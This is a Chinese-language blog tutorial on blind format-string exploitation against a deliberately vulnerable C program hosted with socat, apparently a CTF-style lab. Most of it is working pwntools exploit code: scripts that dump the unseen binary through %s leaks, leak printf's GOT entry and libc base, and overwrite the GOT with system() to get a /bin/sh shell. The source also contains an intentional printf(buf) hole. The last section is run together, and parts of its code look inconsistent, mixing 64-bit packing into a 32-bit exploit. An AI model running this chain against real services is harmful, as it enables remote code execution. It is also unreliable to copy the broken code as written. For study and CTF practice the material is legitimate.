Blind_pwn之格式化字符串

访客 2020年07月07日 17:22 296 0

本文来源:蚁景科技
PS：本文仅用于技术研究与讨论，严禁用于任何非法用途，造成的一切后果与本站无关可能需要提前了解的知识：格式化字符串原理stdio.h> #include string.h> #include unistd.h> int main(int argc, char *argv[]) { setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); int flag; char buf[1024]; FILE* f; puts("What's your name?"); fgets(buf, 1024, stdin); printf("Hi, "); printf("%s",buf); putchar('\n'); flag = 1; while (flag == 1){ puts("Do you want the flag?"); memset(buf,'\0',1024); read(STDIN_FILENO, buf, 100); if (!strcmp(buf, "no\n")){ printf("I see. Good bye."); return 0; }else { printf("Your input isn't right:"); printf(buf); printf("Please Try again!\n"); } fflush(stdout); } return 0; } 编译 32 位文件：

gcc -z execstack -fno-stack-protector -m32 -o leakmemory leakmemory.c

用 socat 挂到端口 10001 上部署：

socat TCP4-LISTEN:10001,fork EXEC:./leakmemory

实验环境完成，如果是本地部署的话，等等在 exp 里面写 remote("127.0.0.1",10001) 模拟没有 binary 的远程盲打情况。确定程序的位数用 %p 看看程序回显输出的长度是多少，以此判断程序的位数。这里看到回显是 4 个字节，判断是 32 位程序。可以再多泄露几个，都是 4 字节（含）以下的，确定为 32 位程序。 Blind_pwn之格式化字符串-第1张图片-网盾网络安全培训

确定格式化字符串偏移找到格式化字符串的偏移是多少，在后续操作中会用到。由于没有 binary 不能通过调试分析偏移，就采取输入多个 %p 泄露出偏移。为了容易辨认，字符串开始先填充 4 字节的填充（64位8字节），然后再填入 %p 。最后确认偏移为 7 。 Blind_pwn之格式化字符串-第2张图片-网盾网络安全培训

dump 程序 dump 程序应该选哪个格式化字符串： %n$s ：将第 n 个参数的值作为地址，输出这个地址指向的字符串内容 %n$p ：将第 n 个参数的值作为内容，以十六进制形式输出我们是需要 dump 程序，也就是想获取我们所给定地址的内容，而不是获取我们给定的地址。所以应该用 %n$s 把我们给定地址当作指针，输出给定地址所指向的字符串。结合前面知道格式化字符串偏移为 7 ，payload 应该为：%9$s.TMP[addr] 。注意：使用 %s 进行输出并不是一个字节一个字节输出，而是一直输出直到遇到 \x00 截止符才会停止，也就是每次泄露的长度是不确定的，可能很长也可能是空。因为 .text 段很可能有连续 \x00 ，所以泄露脚本处理情况有：

针对每次泄露长度不等，addr 根据每次泄露长度动态增加；
泄露字符串可能为空，也就是如何处理 \x00 ；

除此之外，还有一个问题是泄露的起始地址在哪里？从各个大佬文章学到两种做法：从 .text 段开始；从程序加载地方开始；两种方法泄露出来程序，在 ida 中呈现有差别。从程序加载地方开始先来说省事的，从程序加载地方开始。程序加载地方 32 位和 64 位各不相同： Blind_pwn之格式化字符串-第3张图片-网盾网络安全培训

32 位：从 0x8048000 开始泄露 64 位：从 0x400000 开始泄露下面是这条例题的泄露脚本，结合注解分析如何处理上面提到的问题：

#! /usr/bin/env python 
# -*- coding: utf-8 -*- 
from pwn import *
import binascii

r = remote('127.0.0.1',10001)

def leak(addr):
    payload = "%9$s.TMP" + p32(addr)
    r.sendline(payload)
    print "leaking:", hex(addr)
    r.recvuntil('right:')
    ret = r.recvuntil(".TMP",drop=True)
    print "ret:", binascii.hexlify(ret), len(ret)
    remain = r.recvrepeat(0.2)
    return ret

# name
r.recv()
r.sendline('nameaaa')
r.recv()

# leak
begin = 0x8048000
text_seg =''
try:
    while True:
        ret = leak(begin)
        text_seg += ret
        begin += len(ret)
        if len(ret) == 0:   # nil
            begin +=1
            text_seg += '\x00'
except Exception as e:
    print e
finally:
    print '[+]',len(text_seg)
    with open('dump_bin','wb') as f:
        f.write(text_seg)

注解：

19-21 行：处理无关泄露的程序流程后，进入格式化字符串漏洞输入状态
24 行：32 位系统加载地址
9 行："%9$s.TMP" 中的 .TMP 既是填充对齐，也是分隔符，方便后面处理数据
14 行：使用binascii 将泄漏出来字符串每一个都从 ascii 转换为十六进制，方便显示
15 行：r.recvrepeat(0.2) 接受返回的垃圾数据，方便下一轮的输入
30 行：泄漏地址动态增加，假如泄漏 1 字节就增加 1 ；泄漏 3 字节就增加 3
31-33 行：处理泄漏长度为 0 ，也就是数据是 \x00 的情况。地址增加 1 ，程序数据加 \x00

运行之后，耐心等待泄漏完成。泄漏出来的程序是不能运行的，但可以在 ida 进过处理可以进行分析、找 plt 、got.plt 等。将泄漏出来的程序，放入 ida ，启动时选择以 binary file 加载，勾选 Load as code segment，并调整偏移为： 0x8048000 （开始泄露的地址）： Blind_pwn之格式化字符串-第3张图片-网盾网络安全培训

可以通过 shift+F12 查字符串定位到 main 函数，然后直接 F5 反编译： Blind_pwn之格式化字符串-第5张图片-网盾网络安全培训

基本结构已经出来了，盲打没有源代码，就需要根据传入参数去判断哪个 sub_xxx 是哪个函数了。比如输出格式化字符串的 sub_8048490 就是 printf 。从 .text 段开始程序启动过程： Blind_pwn之格式化字符串-第6张图片-网盾网络安全培训

从 _start 函数开始就是 .text 段，可以在 ida 中打开一个正常的 binary 观察 text 段开头第一个函数就是 _stat ：（图为 32 位程序） Blind_pwn之格式化字符串-第7张图片-网盾网络安全培训

先用 %p 泄露出栈上数据，找到两个相同地址，而且这个地址很靠近程序加载初地址（32位：0x8048000；64位：0x400000）。脚本如下：

from pwn import *
import sys

p = remote('127.0.0.1',10001)

p.recv()
p.sendline('nameaaa')
p.recv()

def where_is_start(ret_index=null):
    return_addr=0
    for i in range(400):
        payload = '%%%d$p.TMP' % (i)
        p.sendline(payload)
        p.recvuntil('right:')
        val = p.recvuntil('.TMP')
        log.info(str(i*4)+' '+val.strip().ljust(10))
        if(i*4==ret_index):
            return_addr=int(val.strip('.TMP').ljust(10)[2:],16)
            return return_addr
        p.recvrepeat(0.2)

start_addr=where_is_start()

最后在偏移 1164 和 1188 找到 text 段地址 0x8048510 ，可以对比上图，上图是这条例题的截图： Blind_pwn之格式化字符串-第7张图片-网盾网络安全培训

泄露脚本和前面一样只需要修改一下起始地址：

#! /usr/bin/env python 
# -*- coding: utf-8 -*- 
from pwn import *
import binascii
context.log_level = 'info' 
r = remote('127.0.0.1',10001)

def leak(addr):
    payload = "%9$s.TMP" + p32(addr)
    r.sendline(payload)
    print "leaking:", hex(addr)
    r.recvuntil('right:')
    ret = r.recvuntil(".TMP",drop=True)
    print "ret:", binascii.hexlify(ret), len(ret)
    remain = r.recvrepeat(0.2)
    return ret

# name
r.recv()
r.sendline('nameaaa')
r.recv()

# leak
begin = 0x8048510
#begin = 0x8048000
text_seg =''
try:
    while True:
        ret = leak(begin)
        text_seg += ret
        begin += len(ret)
        if len(ret) == 0:   # nil
            begin +=1
            text_seg += '\x00'
except Exception as e:
    print e
finally:
    print '[+]',len(text_seg)
    with open('dump_bin_text','wb') as f:
        f.write(text_seg)

将泄露文件放入 ida 分析，启动时选择以 binary file 加载，勾选Load as code segment，并调整偏移为： 0x8048510 （开始泄露地址）： Blind_pwn之格式化字符串-第9张图片-网盾网络安全培训

找到 main 函数在 0x0804860B ，需要将这部分定义为函数才能反编译，右键地址隔壁的名称 loc_804860B ，creat function 。 Blind_pwn之格式化字符串-第10张图片-网盾网络安全培训

红色部分就是没有泄露出来的函数，后面跟的就是函数 plt 地址。两种方法各有不同，结合实际使用。解题流程着重记录格式化字符串盲打，不一步一步分析这道题目漏洞（详细分析：默小西博客）。这道题目思路是：

确定 printf 的 plt 地址
通过泄露 plt 表中的指令内容确定对应的 got.plt 表地址
通过泄露的 got.plt 表地址泄露 printf 函数的地址
通过泄露的 printf 的函数地址确定 libc 基址，从而获得 system 地址
使用格式化字符串的任意写功能将 printf 的 got.plt 表中的地址修改为 system 的地址
send 字符串 “/bin/sh” ，那么在调用 printf(“/bin/sh”) 的时候实际上调用的是 system(“/bin/sh;”) ，从而成功获取shell

确定 printf 的 plt 地址将泄露出来的程序，放入 ida 中分析获得，函数名后半截就是地址 0x8048490 ： Blind_pwn之格式化字符串-第11张图片-网盾网络安全培训

泄露 got.plt 和泄露程序 payload 高度相似：

payload = "%9$sskye" + p32(printf_plt)
p.sendline(payload)
# \xff\x25 junk code
p.recvuntil('right:\xff\x25')
printf_got_plt = u32(p.recv(4))

注解：为什么接收 'right:\xff\x25' ？ right: 是固定回显，\xff\x25 是无用字节码。实际上 0x8048490 的汇编是这样的：

pwndbg> pdisass 0x8048490 
 ► 0x8048490 printf@plt>       jmp    dword ptr [0x804a018] 0xf7e4d670>

   0x8048496 printf@plt+6>     push   0x18
   0x804849b printf@plt+11>    jmp    0x8048450
# 字节码
pwndbg> x /20wx 0x8048490
0x8048490 printf@plt>:	0xa01825ff	0x18680804	0xe9000000	0xffffffb0

0x8048490 指向是一条跳转 got.plt 指令，我们需要其中跳转的目标地址。\xff\x25 就是跳转指令的字节码，我们就要先接收 2 字节垃圾数据，然后再接收 4 字节的 got.plt 地址。泄露 printf 函数的地址构造方法同上，但不需要接收 2 字节垃圾数据：

payload = "%9$sskye" + p32(printf_got_plt)
p.sendline(payload)
p.recvuntil('right:')
printf_got = u32(p.recv(4))

泄露 libc 基址8 log.info("printf_got:"+hex(printf_got)) # libcdatabase libc_base = printf_got - 0x055800 log.info("libc_base:"+hex(libc_base)) system_addr = libc_base + 0x045390 log.info("system_addr:"+hex(system_addr)) one = p64(system_addr)[:2] two = p64(system_addr>>16)[:2] payload = "%9104c%12$hn%54293c%13$hn" + 'a'*7 payload += p64(printf_got_plt) + p64(printf_got_plt+2) p.sendline(payload) p.recv() p.sendline('/bin/sh\x00') p.interactive() 更多实例